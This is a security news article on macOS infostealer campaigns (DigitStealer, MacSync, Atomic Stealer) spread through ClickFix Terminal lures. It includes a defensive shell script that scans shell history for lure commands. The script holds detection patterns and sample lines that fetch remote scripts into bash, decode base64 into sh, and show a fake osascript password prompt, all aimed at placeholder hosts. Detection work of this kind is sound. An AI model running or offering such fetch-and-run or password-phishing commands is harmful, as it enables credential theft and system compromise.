Microsoft researchers have identified three major malware campaigns targeting macOS users. Learn how these infostealers use fake AI tools and Terminal commands to steal your passwords and crypto wallets before deleting themselves to hide the evidence.
For years, many of us have felt a sense of security using macOS, believing that malware was mainly a Windows problem. That is changing: according to the Microsoft Defender Security Research Team, cybercriminals are now aggressively targeting macOS with social-engineering lures and new delivery techniques.
The Three Mac Threats
Since late 2025, Microsoft Defender Experts have tracked a surge in infostealer attacks. These campaigns use social engineering to trick people into downloading malicious files. The trap typically starts with a fake Google ad: users searching for helpful tools like DynamicLake or new AI software are redirected to sites that use a lure called ClickFix, a fake error or verification prompt that tells the visitor to paste a command into Terminal to "fix" the problem.
Further investigation revealed three major campaigns specifically designed to hit Mac users. First is DigitStealer, which hides inside fake versions of DynamicLake software. Second is MacSync, which is particularly sneaky because it is delivered via commands users are tricked into copying and pasting into their Terminal. The third one is Atomic Stealer, which poses as a helpful AI tool installer. While they all arrive differently, all three have the same goal of stealing:
- Cryptocurrency wallet information
- Browser credentials and saved passwords
- Developer credentials (like AWS or SSH keys) used to access company data
Once these programmes have collected the data they want and sent it to the attackers’ servers, they delete themselves and their working files to remove traces of the infection. This hit-and-run tactic makes it much harder for a normal user to realise they have been compromised at all.
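Because a ClickFix lure depends on the victim pasting a command into Terminal, the pasted command itself usually survives in shell history even after the stealer has removed its own files. The script below is an added example, not code from the Microsoft report or from any product named on this page: it triages a bash or zsh history file for the command shapes such lures commonly take. The four patterns (a download piped into a shell, a base64 blob decoded into a shell, an osascript password dialog, and a shell `-c` wrapping a fetched script), the constructed sample history, and the placeholder hosts are assumptions for illustration, not indicators published on this page.

```shell
#!/bin/sh
# Added example, not code from the Microsoft report or any named product:
# read-only triage of a shell history file for the command shapes a
# ClickFix-style lure asks the victim to paste into Terminal. The patterns
# below are assumptions about common lure shapes, not indicators published
# on the page this accompanies.

# POSIX ERE patterns. A literal pipe is written [|] so the same regex works
# with both GNU and BSD grep.
PAT_FETCH_PIPE_SH='(curl|wget)[^|]*[|][[:space:]]*(ba|z)?sh([[:space:]]|$)'
PAT_B64_PIPE_SH='base64[[:space:]]+(-d|-D|--decode)[^|]*[|][[:space:]]*(ba|z)?sh([[:space:]]|$)'
PAT_OSASCRIPT_PW='osascript.*hidden answer'
PAT_SH_C_FETCH='(ba|z)?sh[[:space:]]+-c[[:space:]]+.?\$\((curl|wget)'

# normalize_history FILE: strip the zsh extended-history prefix ": epoch:dur;"
# so bash and zsh history files are scanned the same way.
normalize_history() {
    sed 's/^: [0-9][0-9]*:[0-9][0-9]*;//' "$1"
}

# list_suspicious FILE: print every history entry matching any pattern.
# grep exits 1 when nothing matches; that is not an error here.
list_suspicious() {
    normalize_history "$1" | grep -E \
        -e "$PAT_FETCH_PIPE_SH" -e "$PAT_B64_PIPE_SH" \
        -e "$PAT_OSASCRIPT_PW" -e "$PAT_SH_C_FETCH" || true
}

# count_suspicious FILE: number of matching entries, printed to stdout
# ("0" when there are none).
count_suspicious() {
    list_suspicious "$1" | grep -c . || true
}

# write_sample_history FILE: constructed zsh history mixing ordinary developer
# commands with four planted lure-style commands. Hosts are placeholders and
# the base64 string is an opaque placeholder, not a real payload.
write_sample_history() {
    cat > "$1" <<'EOF'
: 1700000000:0;ls -la ~/Projects
: 1700000001:0;git pull --rebase
: 1700000002:0;echo "ZmFrZS1wYXlsb2FkLXBsYWNlaG9sZGVyCg==" | base64 -d | sh
: 1700000003:0;curl -fsSL http://example.invalid/fix | bash
: 1700000004:0;osascript -e 'display dialog "System needs your password to continue" default answer "" with hidden answer'
: 1700000005:0;brew upgrade
: 1700000006:0;nohup bash -c "$(curl -s http://example.invalid/x)" >/dev/null 2>&1 &
EOF
}

SAMPLE="$(mktemp)"
write_sample_history "$SAMPLE"
printf 'Suspicious entries in constructed sample: %s\n' "$(count_suspicious "$SAMPLE")"
list_suspicious "$SAMPLE"
rm -f "$SAMPLE"
# On a machine under triage, point it at the real file instead, e.g.
#   list_suspicious "$HOME/.zsh_history"
```

A hit is a lead for investigation, not proof of compromise: developers legitimately pipe installers into a shell, so read the matched line and the URL it fetched before drawing conclusions. Also note that zsh writes history to disk only when the shell exits unless INC_APPEND_HISTORY or SHARE_HISTORY is set, so a Terminal window that is still open may not yet have flushed the pasted command.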
High stakes for people and businesses
The damage from these thefts can be devastating. For an individual, stolen credentials allow attackers to take over banking, email, and social media accounts. If a cryptocurrency wallet is emptied, it often results in immediate financial loss that cannot be reversed.
For businesses, the risk is even higher. According to researchers, when developer credentials are stolen, hackers can gain access to a company’s source code, cloud infrastructure, and even private customer data.
The danger is not limited to malicious websites. In late 2025, Microsoft investigated PXA Stealer, a tool linked to Vietnamese-speaking threat actors. These attackers used phishing emails to target the government and education sectors.
Even trusted messaging apps like WhatsApp are being abused. In November 2025, a campaign hijacked WhatsApp accounts and used them to send malicious attachments to each victim’s entire contact list. This spread the Eternidade Stealer, which watches for active windows related to payment services such as Stripe, Binance and MercadoPago. To stay safe, experts suggest sticking to official app stores and never running unknown commands in your Terminal.
Expert Insights
Trey Ford, Chief Strategy and Trust Officer at Bugcrowd, noted that this attack “underscores the need to maintain a continuous offensive view of our technology estate.” He warned that threat actors are now “increasingly leveraging AI-powered offensive capabilities to gain a foothold.”
Robert Coles, Senior Cybersecurity Engineer at Black Duck, explained that these tools are becoming the “most effective initial access tools” used today. He highlighted that rather than a software bug, “the user is persuaded into running a trusted system utility to ‘fix’ something.”
Shane Barney, Chief Information Security Officer at Keeper Security, pointed out that these campaigns work because they target overconfidence. “These attackers are not trying to defeat macOS security controls,” he said. Instead, they “blend into normal activity” by using native tools and scripting languages like Python.
